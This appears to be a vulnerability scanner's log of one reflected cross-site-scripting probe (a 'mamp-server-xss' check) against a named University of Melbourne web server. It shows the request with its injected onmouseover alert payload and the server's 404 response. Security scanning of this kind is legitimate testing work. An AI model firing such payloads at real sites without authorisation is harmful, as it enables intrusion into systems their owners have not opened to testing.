[mamp-server-xss] Dumped HTTP request for https://science-web-prod-bachelor2-all-sites-lb.science.unimelb.edu.au/index.php/test"+onmouseover="alert(document.domain);"+style="font-size:100000px;background-color:white";


GET /index.php/test%22%20onmouseover=%22alert%28document.domain%29;%22%20style=%22font-size:100000px;background-color:white%22; HTTP/1.1
Host: science-web-prod-bachelor2-all-sites-lb.science.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[mamp-server-xss] Dumped HTTP response https://science-web-prod-bachelor2-all-sites-lb.science.unimelb.edu.au/index.php/test"+onmouseover="alert(document.domain);"+style="font-size:100000px;background-color:white";

HTTP/1.1 404 Not Found
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Aug 2025 15:18:18 GMT
Server: Apache/2.4.37 (Red Hat Enterprise Linux) OpenSSL/1.1.1k
Set-Cookie: BIGipServer~app_science_web_prod~pool_science_web_prod_bachelor2_all_sites=1682184108.20480.0000; path=/; Httponly; Secure
X-Powered-By: PHP/7.2.24

File not found.

